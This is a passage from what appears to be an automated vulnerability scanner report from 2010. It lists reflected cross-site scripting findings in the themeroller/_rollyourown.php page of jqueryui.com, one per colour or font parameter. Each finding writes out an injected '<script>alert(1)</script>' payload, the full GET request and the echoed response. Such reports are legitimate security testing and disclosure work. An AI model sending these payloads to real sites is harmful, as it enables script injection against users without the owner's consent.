ay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://jqueryui.com/themeroller/#ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: jqueryui.com
Proxy-Connection: Keep-Alive
Cookie: __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmb=77982607.4.10.1289873280; __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmc=77982607

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:35 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 39552


<a href="/download?themeParams=%3FffDefault%3DSegoe%2BUI%252C%2BArial%252C%2Bsans-serif%26fwDefault%3Dbold%26fsDefault%3D1.1em%26cornerRadius%3D8px%26bgColorHeader%3
...[SNIP]...
<input type="text" name="fcHover" id="fcHover" class="hex" value="381f00c0ba1\\\"><script>alert(1)</script>88118119e1e" size="6" />
...[SNIP]...

1.164. http://jqueryui.com/themeroller/_rollyourown.php [ffDefault parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/_rollyourown.php

Issue detail

The value of the ffDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d332"><script>alert(1)</script>12a346ef725 was submitted in the ffDefault parameter. This input was echoed as 3d332\\\"><script>alert(1)</script>12a346ef725 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/_rollyourown.php?ffDefault=Segoe+UI%2C+Arial%2C+sans-serif3d332"><script>alert(1)</script>12a346ef725&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://jqueryui.com/themeroller/#ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: jqueryui.com
Proxy-Connection: Keep-Alive
Cookie: __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmb=77982607.4.10.1289873280; __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmc=77982607

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:19 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 39552


<a href="/download?themeParams=%3FffDefault%3DSegoe%2BUI%252C%2BArial%252C%2Bsans-serif3d332%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E12a346ef725%26fwDefault%3Dbo
...[SNIP]...
<input type="text" name="ffDefault" id="ffDefault" class="ffDefault" value="Segoe UI, Arial, sans-serif3d332\\\"><script>alert(1)</script>12a346ef725" size="8" />
...[SNIP]...

1.165. http://jqueryui.com/themeroller/_rollyourown.php [fsDefault parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/_rollyourown.php

Issue detail

The value of the fsDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f2bd"><script>alert(1)</script>3c85cbdd759 was submitted in the fsDefault parameter. This input was echoed as 1f2bd\\\"><script>alert(1)</script>3c85cbdd759 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/_rollyourown.php?ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em1f2bd"><script>alert(1)</script>3c85cbdd759&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://jqueryui.com/themeroller/#ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: jqueryui.com
Proxy-Connection: Keep-Alive
Cookie: __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmb=77982607.4.10.1289873280; __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmc=77982607

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:21 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 39552


<a href="/download?themeParams=%3FffDefault%3DSegoe%2BUI%252C%2BArial%252C%2Bsans-serif%26fwDefault%3Dbold%26fsDefault%3D1.1em1f2bd%22%3E%3Cscript%3Ealert%281%29%3C%
...[SNIP]...
<input type="text" name="fsDefault" id="fsDefault" class="fsDefault" value="1.1em1f2bd\\\"><script>alert(1)</script>3c85cbdd759" size="3" />
...[SNIP]...

1.166. http://jqueryui.com/themeroller/_rollyourown.php [iconColorActive parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/_rollyourown.php

Issue detail

The value of the iconColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac817"><script>alert(1)</script>fb276a0769b was submitted in the iconColorActive parameter. This input was echoed as ac817\\\"><script>alert(1)</script>fb276a0769b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/_rollyourown.php?ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990fac817"><script>alert(1)</script>fb276a0769b&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://jqueryui.com/themeroller/#ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: jqueryui.com
Proxy-Connection: Keep-Alive
Cookie: __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmb=77982607.4.10.1289873280; __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmc=77982607

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:40 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 39552


<a href="/download?themeParams=%3FffDefault%3DSegoe%2BUI%252C%2BArial%252C%2Bsans-serif%26fwDefault%3Dbold%26fsDefault%3D1.1em%26cornerRadius%3D8px%26bgColorHeader%3
...[SNIP]...
<input type="text" name="iconColorActive" id="iconColorActive" class="hex" value="eb990fac817\\\"><script>alert(1)</script>fb276a0769b" size="6" />
...[SNIP]...

1.167. http://jqueryui.com/themeroller/_rollyourown.php [iconColorContent parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/_rollyourown.php

Issue detail

The value of the iconColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36cec"><script>alert(1)</script>eae2f93adaf was submitted in the iconColorContent parameter. This input was echoed as 36cec\\\"><script>alert(1)</script>eae2f93adaf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/_rollyourown.php?ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d1940536cec"><script>alert(1)</script>eae2f93adaf&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://jqueryui.com/themeroller/#ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: jqueryui.com
Proxy-Connection: Keep-Alive
Cookie: __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmb=77982607.4.10.1289873280; __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmc=77982607

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:28 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 39552


<a href="/download?themeParams=%3FffDefault%3DSegoe%2BUI%252C%2BArial%252C%2Bsans-serif%26fwDefault%3Dbold%26fsDefault%3D1.1em%26cornerRadius%3D8px%26bgColorHeader%3
...[SNIP]...
<input type="text" name="iconColorContent" id="iconColorContent" class="hex" value="d1940536cec\\\"><script>alert(1)</script>eae2f93adaf" size="6" />
...[SNIP]...

1.168. http://jqueryui.com/themeroller/_rollyourown.php [iconColorDefault parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/_rollyourown.php

Issue detail

The value of the iconColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d6885"><script>alert(1)</script>77d23ead5ea was submitted in the iconColorDefault parameter. This input was echoed as d6885\\\"><script>alert(1)</script>77d23ead5ea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/_rollyourown.php?ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3dd6885"><script>alert(1)</script>77d23ead5ea&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://jqueryui.com/themeroller/#ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: jqueryui.com
Proxy-Connection: Keep-Alive
Cookie: __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmb=77982607.4.10.1289873280; __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmc=77982607

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:32 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 39552


<a href="/download?themeParams=%3FffDefault%3DSegoe%2BUI%252C%2BArial%252C%2Bsans-serif%26fwDefault%3Dbold%26fsDefault%3D1.1em%26cornerRadius%3D8px%26bgColorHeader%3
...[SNIP]...
<input type="text" name="iconColorDefault" id="iconColorDefault" class="hex" value="3d3d3dd6885\\\"><script>alert(1)</script>77d23ead5ea" size="6" />
...[SNIP]...

1.169. http://jqueryui.com/themeroller/_rollyourown.php [iconColorError parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/_rollyourown.php

Issue detail

The value of the iconColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8f25"><script>alert(1)</script>302e12ef894 was submitted in the iconColorError parameter. This input was echoed as e8f25\\\"><script>alert(1)</script>302e12ef894 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

